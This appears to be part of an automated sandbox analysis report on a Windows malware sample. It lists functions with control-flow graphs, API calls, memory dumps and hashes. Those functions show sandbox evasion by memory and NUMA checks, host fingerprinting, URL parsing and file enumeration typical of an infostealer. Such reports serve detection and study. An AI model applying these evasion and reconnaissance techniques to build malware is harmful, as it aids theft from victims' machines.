                        control_flow_graph 2782 462740-462783 GetWindowsDirectoryA 2783 462785 2782->2783 2784 46278c-4627ea GetVolumeInformationA 2782->2784 2783->2784 2785 4627ec-4627f2 2784->2785 2786 4627f4-462807 2785->2786 2787 462809-462820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 462826-462844 wsprintfA 2787->2788 2789 462822-462824 2787->2789 2790 46285b-462872 call 4671e0 2788->2790 2789->2790
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0046277B
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,004593B6,00000000,00000000,00000000,00000000), ref: 004627AC
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0046280F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462816
                        • wsprintfA.USER32 ref: 0046283B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                        • String ID: :\$C
                        • API String ID: 2572753744-3309953409
                        • Opcode ID: 8404a5740e2298230f9c2c7ee6063131fe6411e321f1ceda32cd24eb594425fe
                        • Instruction ID: 20785adc5a2f69094b701d8e498aeb33a12ce077e91be999441242708abd9ee4
                        • Opcode Fuzzy Hash: 8404a5740e2298230f9c2c7ee6063131fe6411e321f1ceda32cd24eb594425fe
                        • Instruction Fuzzy Hash: C73170B1944209AFCB04DFA88E859EFBFB9EB58710F10016AE505F7250E6748A408BA6
                        Function 00444BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2793 444bc0-444bce 2794 444bd0-444bd5 2793->2794 2794->2794 2795 444bd7-444c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 442a20 2794->2795
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00444BF7
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00444C01
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00444C0B
                        • lstrlen.KERNEL32(?,00000000,?), ref: 00444C1F
                        • InternetCrackUrlA.WININET(?,00000000), ref: 00444C27
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: a2a54c2d028e4ca6c7b982fe778e15cc4a09c59ac36e2c3a2c57a3d2955e7a67
                        • Instruction ID: a84a14867fa37cb5d323014f1c43727e566a930b3bd5f70ce2d6138cd65eac62
                        • Opcode Fuzzy Hash: a2a54c2d028e4ca6c7b982fe778e15cc4a09c59ac36e2c3a2c57a3d2955e7a67
                        • Instruction Fuzzy Hash: 5B012171D00218AFDB14DFA9EC45B9EBBB8EB44364F004126F914E7390DB7459058FD5
                        Function 00441030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2798 441030-441055 GetCurrentProcess VirtualAllocExNuma 2799 441057-441058 ExitProcess 2798->2799 2800 44105e-44107b VirtualAlloc 2798->2800 2801 441082-441088 2800->2801 2802 44107d-441080 2800->2802 2803 4410b1-4410b6 2801->2803 2804 44108a-4410ab VirtualFree 2801->2804 2802->2801 2804->2803
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00441046
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 0044104D
                        • ExitProcess.KERNEL32 ref: 00441058
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0044106C
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 004410AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                        • String ID:
                        • API String ID: 3477276466-0
                        • Opcode ID: af1a0ff5241c3a90c754438520e04b1927fcedc128ece8a26995cfb1a08e1c04
                        • Instruction ID: c198a7fe1e627ad52f1e2f8b39106cb3a6a5ebb873988fe9c77b75e9033d5b97
                        • Opcode Fuzzy Hash: af1a0ff5241c3a90c754438520e04b1927fcedc128ece8a26995cfb1a08e1c04
                        • Instruction Fuzzy Hash: 6601D1717802047BF7284A656C1AF6B77EAA785B05F309019F708E7390DAB5A9808668
                        Function 0045EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2805 45ee90-45eeb5 call 442930 2808 45eeb7-45eebf 2805->2808 2809 45eec9-45eecd call 446c40 2805->2809 2808->2809 2810 45eec1-45eec3 lstrcpy 2808->2810 2812 45eed2-45eee8 StrCmpCA 2809->2812 2810->2809 2813 45ef11-45ef18 call 442a20 2812->2813 2814 45eeea-45ef02 call 442a20 call 442930 2812->2814 2819 45ef20-45ef28 2813->2819 2823 45ef45-45efa0 call 442a20 * 10 2814->2823 2824 45ef04-45ef0c 2814->2824 2819->2819 2822 45ef2a-45ef37 call 442930 2819->2822 2822->2823 2830 45ef39 2822->2830 2824->2823 2826 45ef0e-45ef0f 2824->2826 2829 45ef3e-45ef3f lstrcpy 2826->2829 2829->2823 2830->2829
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EEC3
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0045EEDE
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0045EF3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: ERROR
                        • API String ID: 3722407311-2861137601
                        • Opcode ID: 6749f1366a2dc8393156b2be6ed9832d5f3b59c70b1b38c12a56d3983d0de3f6
                        • Instruction ID: d69d0a552f219c416f4b4bc57a545b37b3cea4406c128bc8eb240255b4106739
                        • Opcode Fuzzy Hash: 6749f1366a2dc8393156b2be6ed9832d5f3b59c70b1b38c12a56d3983d0de3f6
                        • Instruction Fuzzy Hash: D5216F317202059BDB25FF7ADD46A9B77A4AF10305F40542EBC4ADB312DF78D90487A8
                        Function 004410C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2886 4410c0-4410cb 2887 4410d0-4410dc 2886->2887 2889 4410de-4410f3 GlobalMemoryStatusEx 2887->2889 2890 4410f5-441106 2889->2890 2891 441112-441114 ExitProcess 2889->2891 2892 441108 2890->2892 2893 44111a-44111d 2890->2893 2892->2891 2894 44110a-441110 2892->2894 2894->2891 2894->2893
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: 91ef0f4fc74faaf15273959cb9bc13ca62f7b8623c8868b577c90aa612c5a6eb
                        • Instruction ID: f7a4570c86f193d05e4e8c5076b8346e83d444313f8d805ee91e92f995796016
                        • Opcode Fuzzy Hash: 91ef0f4fc74faaf15273959cb9bc13ca62f7b8623c8868b577c90aa612c5a6eb
                        • Instruction Fuzzy Hash: 1FF0A7701182455BFB146B74D94A72EF7D9EB0A351F10492BDE9EC22A2E678C8C0917F
                        Function 00458C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2895 458c88-458cc4 StrCmpCA 2898 458cc6-458cc7 ExitProcess 2895->2898 2899 458ccd-458ce6 2895->2899 2901 458ee2-458eef call 442a20 2899->2901 2902 458cec-458cf1 2899->2902 2904 458cf6-458cf9 2902->2904 2905 458ec3-458edc 2904->2905 2906 458cff 2904->2906 2905->2901 2940 458cf3 2905->2940 2908 458d84-458d92 StrCmpCA 2906->2908 2909 458da4-458db8 StrCmpCA 2906->2909 2910 458d06-458d15 lstrlen 2906->2910 2911 458e6f-458e7d StrCmpCA 2906->2911 2912 458e88-458e9a lstrlen 2906->2912 2913 458e56-458e64 StrCmpCA 2906->2913 2914 458d30-458d3f lstrlen 2906->2914 2915 458dbd-458dcb StrCmpCA 2906->2915 2916 458ddd-458deb StrCmpCA 2906->2916 2917 458dfd-458e0b StrCmpCA 2906->2917 2918 458e1d-458e2b StrCmpCA 2906->2918 2919 458e3d-458e4b StrCmpCA 2906->2919 2920 458d5a-458d69 lstrlen 2906->2920 2908->2905 2924 458d98-458d9f 2908->2924 2909->2905 2929 458d17-458d1c call 442a20 2910->2929 2930 458d1f-458d2b call 442930 2910->2930 2911->2905 2933 458e7f-458e86 2911->2933 2934 458ea4-458eb0 call 442930 2912->2934 2935 458e9c-458ea1 call 442a20 2912->2935 2913->2905 2932 458e66-458e6d 2913->2932 2936 458d41-458d46 call 442a20 2914->2936 2937 458d49-458d55 call 442930 2914->2937 2915->2905 2925 458dd1-458dd8 2915->2925 2916->2905 2926 458df1-458df8 2916->2926 2917->2905 2927 458e11-458e18 2917->2927 2918->2905 2928 458e31-458e38 2918->2928 2919->2905 2931 458e4d-458e54 2919->2931 2921 458d73-458d7f call 442930 2920->2921 2922 458d6b-458d70 call 442a20 2920->2922 2955 458eb3-458eb5 2921->2955 2922->2921 2924->2905 2925->2905 2926->2905 2927->2905 2928->2905 2929->2930 2930->2955 2931->2905 2932->2905 2933->2905 2934->2955 2935->2934 2936->2937 2937->2955 2940->2904 2955->2905 2956 458eb7-458eb9 2955->2956 2956->2905 2957 458ebb-458ebd lstrcpy 2956->2957 2957->2905
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 0e283b068cf578668a2bd46796755cd484fefb8b51c6953099a83d7706e19808
                        • Instruction ID: 550f340abb0957dff4de7882be752bfe63b1a38f245d29b098226430db7c6016
                        • Opcode Fuzzy Hash: 0e283b068cf578668a2bd46796755cd484fefb8b51c6953099a83d7706e19808
                        • Instruction Fuzzy Hash: 49E09A60610289EBDB049BB9DC88DCA7BACAF84710B00842DB908A7221DA74ED04C368
                        Function 00462AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2958 462ad0-462b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 462b44-462b59 2958->2959 2960 462b24-462b36 2958->2960
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00462AFF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462B06
                        • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00462B1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 64d1ae9e8dd4b9dce1c8a19f7a9c44fd35e0662c56ff7ef107b773e54c6aceed
                        • Instruction ID: 2e4345245159f6dd53e08154c3fb2dccaf41bb971afd146feb9fbc12bc651fe4
                        • Opcode Fuzzy Hash: 64d1ae9e8dd4b9dce1c8a19f7a9c44fd35e0662c56ff7ef107b773e54c6aceed
                        • Instruction Fuzzy Hash: E801D672A44608ABC714CF99ED45BAEF7F8F744B21F00026BF919E3780D77819008BA5

                        Non-executed Functions

                        Function 00452390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004523D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004523F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00452402
                        • lstrlen.KERNEL32(\*.*), ref: 0045240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00452436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00452486
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: c190d98dbde5f981b8d085c98462583308a51e3d8750a7cd5dc2d37cd2fea973
                        • Instruction ID: f3eb42caed11a4e3461dcd94f5738503debbbab5d98d7e00ff9036dad8bfd827
                        • Opcode Fuzzy Hash: c190d98dbde5f981b8d085c98462583308a51e3d8750a7cd5dc2d37cd2fea973
                        • Instruction Fuzzy Hash: 2FA2C470A102169BDB25AF75CE88AAF77B9AF05305F44402BFC09E3352DB78DD458B68
                        Function 004416A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004416E2
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044176C
                        • lstrcat.KERNEL32(00000000), ref: 00441776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004417A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004417EF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004417F9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441825
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441875
                        • lstrcat.KERNEL32(00000000), ref: 0044187F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004418AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004418F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004418FE
                        • lstrlen.KERNEL32(00471794), ref: 00441909
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441929
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00441935
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044195B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00441966
                        • lstrlen.KERNEL32(\*.*), ref: 00441971
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044198E
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0044199A
